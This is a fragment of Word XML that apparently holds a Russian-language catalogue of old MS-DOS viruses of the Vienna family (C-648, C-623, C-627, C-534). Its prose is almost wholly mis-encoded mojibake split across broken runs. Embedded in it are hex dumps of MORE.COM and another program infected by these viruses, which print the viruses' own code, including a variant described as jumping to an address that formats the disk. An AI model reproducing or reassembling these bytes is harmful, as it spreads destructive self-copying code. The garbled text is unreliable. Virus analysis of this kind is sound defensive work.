      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㭨���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠫ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਥ��  �ᯮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>짮����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮡ����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 ᮮ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥������� ��⥩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� ⮣�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮧ���� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠫�� BAT (��� ����� ���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ந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 � ���� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ॡ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㥬� �맮�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ணࠬ� � ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">BATCH </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">砥 �����筮 㪠���� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>PATH ⮫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쪮 ���  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠫��,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᭮</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  ��᪮���  �� ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� ⨯� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">COM � ��� ���.  ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮᮡ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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>襭��� ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᭮��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠢��� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।������ 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⥫�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㤮��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠. ���⮬� ��� �⮨� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>짮���� ��� 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ன ᯮᮡ  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樭�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢����  ��⮨�  � ����� � ��᫥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६��� ᮧ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� ����� ������ ��� ��� 䠩��� ⨯� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM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 xml:space="preserve">⢥�����  ������������  ��������  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᥪ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㭤 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(62) �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>६��� 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᫥���� ���� ��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࠭�� ���������� ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⢮ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᥪ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㭤</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>).  ������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砥� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠢ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ����� ������� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᭮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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠡ�⪥ ⥬ ��� ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠣�� ��᫥���� ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ਭ��� ����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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ������ �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஡���� ���� ᪮॥  ⥮���᪨�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, 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᪨� �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ࠣ���� ����� �ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MORE.COM, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� ����ᮬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>C-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0: E9 17 01 21 3D 03 1E 74 09 BA FC 01 B4 09 CD 21  ...!=..t....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: CD 20 C6 06 E5 01 19 B4 0F CD 10 88 26 E6 01 BA  . ..........&amp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0: 17 02 B4 09 CD 21 33 DB B4 45 CD 21 8B E8 B4 3E  .....!3..E.!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0: CD 21 BB 02 00 B4 45 CD 21 FC BA 1A 02 B9 00 10  .!....E.!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0: 8B DD B4 3F CD 21 0B C0 75 02 CD 20 8B C8 8B F2  ...?.!..u..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0: AC 3C 1A 74 F5 3C 0D 75 07 C6 06 E8 01 01 EB 4C  .&lt;.t.&lt;.u.......L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0: 3C 0A 75 06 FE 06 E7 01 EB 42 3C 08 75 0D 80 3E  &lt;.u......B&lt;.u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0: E8 01 01 74 37 FE 0E E8 01 EB 31 3C 09 75 12 8A  ...t7.....1&lt;.u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0: 26 E8 01 80 C4 07 80 E4 F8 FE C4 88 26 E8 01 EB  &amp;...........&amp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0: 1B 3C 07 74 17 FE 06 E8 01 8A 26 E8 01 3A 26 E6  .&lt;.t......&amp;..:&amp;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0: 01 76 09 FE 06 E7 01 C6 06 E8 01 01 8A D0 B4 02  .v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0: CD 21 8A 26 E7 01 3A 26 E5 01 72 20 BA F0 01 B4  .!.&amp;..:&amp;..r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C0: 09 CD 21 B4 0C B0 01 CD 21 BA 17 02 B4 09 CD 21  ..!.....!...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>01D0: C6 06 E8 01 01 C6 06 E7 01 01 4E 41 49 74 03 E9  ..........NA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E0: 6E FF E9 54 FF 18 50 01 01 00 00 00 00 00 00 00  n..T..P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0: 0D 2D 2D 20 4D 6F 72 65 20 2D 2D 24 4D 4F 52 45  .-- More --$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: 3A 20 49 6E 63 6F 72 72 65 63 74 20 44 4F 53 20  : Incorrec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0: 76 65 72 73 69 6F 6E 0D 0A 24 51 BA 13 04 FC 8B  version..$Q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0: F2 81 C6 0A 00 BF 00 01 B9 03 00 F3 A4 8B F2 B4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0: 30 CD 21 3C 00 75 03 E9 C7 01 06 B4 2F CD 21 89  0.!&lt;.u....../.!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0: 9C 00 00 8C 84 02 00 07 BA 5F 00 90 03 D6 B4 1A  ........._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0: CD 21 06 56 8E 06 2C 00 BF 00 00 5E 56 81 C6 1A  .!.V..,....^V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0: 00 AC B9 00 80 F2 AE B9 04 00 AC AE 75 ED E2 FA  ............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0: 5E 07 89 BC 16 00 8B FE 81 C7 1F 00 8B DE 81 C6  ^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0: 1F 00 8B FE EB 3A 83 BC 16 00 00 75 03 E9 63 01  .....:.....u.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0: 1E 56 26 8E 1E 2C 00 8B FE 26 8B B5 16 00 81 C7  .V&amp;..,...&amp;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0: 1F 00 AC 3C 3B 74 0A 3C 00 74 03 AA EB F4 BE 00  ...&lt;;t.&lt;.t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B0: 00 5B 1F 89 B7 16 00 80 7D FF 5C 74 03 B0 5C AA  .[......}.\t..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F0: D6 CD 21 1E B4 1A 8B 94 00 00 8E 9C 02 00 CD 21  ..!.........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0: 1F 59 33 C0 33 DB 33 D2 33 F6 BF 00 01 57 33 FF  .Y3.3.3.3....W3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0: C2 FF FF 80 00 70 1D 01 00 21 10 20 00 B4 30 CD  .....p...!. .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20: E9 17 01 2A 2E 43 4F 4D 00 1C 00 26 03 50 41 54  ...*.COM...&amp;.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430: 48 3D 4D 4F 52 45 2E 43 4F 4D 00 4D 00 43 4F 4D  H=MORE.COM.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0: 00 4D 00 4D 00 00 43 4F 4D 00 20 20 20 20 20 20  .M.M.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50: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20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460: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20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470: 20 20 04 3F 3F 3F 3F 3F 3F 3F 3F 43 4F 4D 03 01    .????????COM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80: 00 00 00 C4 00 9A 1B 20 01 00 21 10 1A 01 00 00  ....... ..!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90: 4D 4F 52 45 2E 43 4F 4D 00 00 4D 00 00 EA F0 FF  MORE.COM..M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A0: 00 F0                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ࠣ���� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MORE.COM, "</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㭨�⮦�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮬ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-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0: EA F0 FF 00 F0 03 1E 74 09 BA FC 01 B4 09 CD 21  .......t....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: CD 20 C6 06 E5 01 19 B4 0F CD 10 88 26 E6 01 BA  . ..........&amp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0: 17 02 B4 09 CD 21 33 DB B4 45 CD 21 8B E8 B4 3E  .....!3..E.!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0: CD 21 BB 02 00 B4 45 CD 21 FC BA 1A 02 B9 00 10  .!....E.!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0: 8B DD B4 3F CD 21 0B C0 75 02 CD 20 8B C8 8B F2  ...?.!..u..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... ... ... ... ... ... ... ... ... ... ... ...  ... ... ...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2. �⠬� �-623 (Vienna-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-623  �⫨</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">砥���  ��  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>C-648  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>稥� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠡ�⪨ ����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砭��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯥ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">稢��� ���������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饭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protect error writing device &lt;���.���.���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ன�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠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, Retry, Ignore, F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⪥ ����� �� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饭��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪥��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஬� ⮣�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㭨�⮦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㫨 �����뢠���� ���室 �� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>C800:0000.  �������� ���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 �� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㤥� �믮����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ଠ⨧��� ��᪠</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ����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㫨 ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">᪠�� �� ᨣ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EA000000C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 xml:space="preserve">⠬� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮤ�ন� ����ணࠬ�� ��ࠡ�⪨ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>訡��  �����  �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  ��  ����⪥  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ���� �ணࠬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ�������� �� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뤠���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮮ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">饣� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">饭�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MS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ࠣ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Dumy16, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ������ ����ᮬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>C-6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: E9 A0 00 90 90 90 90 90  90 90 90 90 90 90 90 9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: 80 00 ED 25 1B 01 21 00  20 00 90 90 90 E9 A0 00   ...%..!.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: 2A 2E 43 4F 4D 00 1C 00  0E 04 50 41 54 48 3D 47   *.COM.....PATH=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0: 36 32 33 2E 43 4F 4D 00  00 00 20 20 20 20 20 20   623.CO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: 20 20 20 20 20 20 20 20  20 20 20 20 20 20 20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0: 20 20 20 20 20 20 20 20  20 20 20 20 20 20 20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0: 20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 03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 3F 3F 3F 3F 3F 3F 3F 3F  43 4F 4D 03 07 00 EE 02   ????????COM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0: 00 00 00 00 20 1B 01 21  00 10 00 00 00 47 36 32   .... ..!.....G6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0: 33 2E 43 4F 4D 00 00 00  00 00 EA 00 00 00 C8 56   3.COM..........V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0: 05 0E 25 51 BA 10 01 FC  8B F2 83 C6 0A BF 00 01   ..%Q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B0: B9 03 00 F3 A4 8B F2 B4  30 CD 21 3C 00 75 03 E9   ........0.!&lt;.u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0: A8 01 06 B4 2F CD 21 89  1C 8C 44 02 B8 24 35 CD   ..../.!...D..$5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0: 21 89 9C 8F 00 8C 84 91  00 07 B8 24 25 8B D6 81   !..........$%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0: C2 6C 02 CD 21 BA 5F 00  03 D6 B4 1A CD 21 06 56   .l..!._......!.V</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>00F0: 8E 06 2C 00 33 FF 5E 56  83 C6 1A AC B9 00 80 F2   ..,.3.^V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: AE B9 04 00 AC AE 75 EE  E2 FA 5E 07 89 7C 16 8B   ......u...^..|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: DE 83 C6 1F 8B FE EB 35  83 7C 16 6C 75 03 E9 31   .......5.|.lu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0: 01 1E 56 26 8E 1E 2C 00  8B FE 26 8B 75 16 83 C7   ..V&amp;..,...&amp;.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0: 1F AC 3C 3B 74 09 3C 00  74 03 AA EB F4 33 F6 5B   ..&lt;;t.&lt;.t....3.[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0: 1F 89 77 16 80 7D FF 5C  74 03 B0 5C AA 89 7F 18   ..w..}.\t..\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0: 8B F3 83 C6 10 B1 06 F3  A4 8B F3 B4 4E BA 1F 00   ............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0: 03 D6 B1 03 CD 21 EB 04  B4 4F CD 21 73 02 EB A8   .....!...O.!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0: 8B 44 75 24 1F 3C 1F 74  EF 81 7C 79 00 FA 77 E8   .Du$.&lt;.t..|y.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0: 83 7C 79 0A 72 E2 8B 7C  18 56 83 C6 7D AC AA 3C   .|y.r..|.V..}..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0: 00 75 FA 5E B8 00 43 BA  1F 00 03 D6 CD 21 89 4C   .u.^..C......!.L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0: 08 B8 01 43 80 E1 FE CD  21 B8 02 3D CD 21 73 03   ...C....!..=.!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0: E9 92 00 8B D8 B8 00 57  CD 21 89 4C 04 89 54 06   .......W.!.L.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C0: B4 2C CD 21 80 E6 07 75  0F B4 40 B9 05 00 8B D6   .,.!...u..@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D0: 81 C2 8A 00 CD 21 EB 58  B4 3F B9 03 00 BA 0A 00   .....!.X.?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E0: 03 D6 CD 21 72 4A 3D 03  00 75 45 B8 02 42 33 C9   ...!rJ=..uE..B3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0: 33 D2 CD 21 72 3A 8B C8  05 90 00 89 44 0E FE C5   3..!r:......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: 8B FE 81 C7 95 00 89 0D  B4 40 B9 6F 02 90 8B D6   .........@.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0: CD 21 72 1C 3D 6F 02 90  75 16 B8 00 42 33 C9 33   .!r.=o..u...B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0: D2 CD 21 72 0B B4 40 B1  03 8B D6 83 C2 0D CD 21   ..!r..@.....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0: 8B 54 06 8B 4C 04 80 E1  E0 80 C9 1F B8 01 57 CD   .T..L........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0: 21 B4 3E CD 21 B8 01 43  8B 4C 08 BA 1F 00 03 D6   !.&gt;.!..C.L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0: CD 21 1E B4 1A 8B 14 8E  5C 02 CD 21 B8 24 25 8B   .!......\..!.$%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0: 94 8F 00 8E 9C 91 00 CD  21 1F 59 33 C0 33 DB 33   ........!.Y3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0: D2 33 F6 BF 00 01 57 33  FF C2 FF FF B0 00 CF      .3....W3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3. �⠬� C-627 (Vienna-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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬�� 627 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪫�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祭 ���� 㭨�⮦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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨� 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।�� ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.�.�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㦥� � ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1989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⮤� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ��� �।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠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���� � ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠���� ����䠣�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>AIDS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4. ����� �-534 (Vienna-B; �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਭ����� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>; Micro-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 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>C-534 ��᫥�������� �� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ﭨ� �����  �</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>648</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> 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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>) � ��⠭�� � ������ �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䨪�樥� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. ��᫥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⪮�� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।������ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.�.�����᪮��,  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">।������ ����� �������  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"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⭨���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>".  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>॥ �ᥣ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ���� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>짮����� ���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⨭��� ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-648 (��-��������,  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>਩᪮�� �ந�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>宦�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>)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ࠧ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>묨  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ﬨ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  ��������⭮ ������� � ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(� ⮬ �᫥,  �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㯮���������� ��� ��砫쭮 �������� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪥�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祢�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">).  ��  ��  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ન����  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室������  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮡ�� ���஦���� ��� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ���� ⠪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室���� �������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢��� ��ࠦ���� �ணࠬ��  �  ४����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 �⭮��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>騥�� � �⮬� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਠ�� ����⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮 ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ঠ�� �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⢥��� ��� ���� �����, �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਡ���� ��� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室����� 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c��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᥬ���஢������ ⥪��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. ��⠫��� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>娢� ������ �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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樮��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢������  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㯠  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஫</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ﬨ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,   �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।����⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭥�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,   ��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஢���� ⥪�� ᫥��� ��ᬠ�ਢ��� ��� ���ਠ� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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짮�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" � �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>栬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ����� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">易�� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ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।�� ����� �� ���������� ���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ଠ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮 �����  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">-534  - </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩���� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१������ �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ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⨯� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㭪樮����� �� ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MS DOS,  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">稭�� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2.0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34  (216h)  ����.  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ�����  ⮫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">쪮 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.COM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� ������ �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>256(100h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00h ���� � ⥪�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饬 � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>୥��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠫����.  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ���� �ந�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室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 ����஢����� �ணࠬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �� �⮬ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� �� ����� ������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믮������ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� �ணࠬ�� �ࠢ����� ��।����� ��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  ����⠭�������� ���� 3 ���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᭮���� �ணࠬ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ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>c�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>७��� ��� � ��ࠦ��� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">.  �� ����� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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EXE </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᠭ�� � ���७��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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⥣�� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">- ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
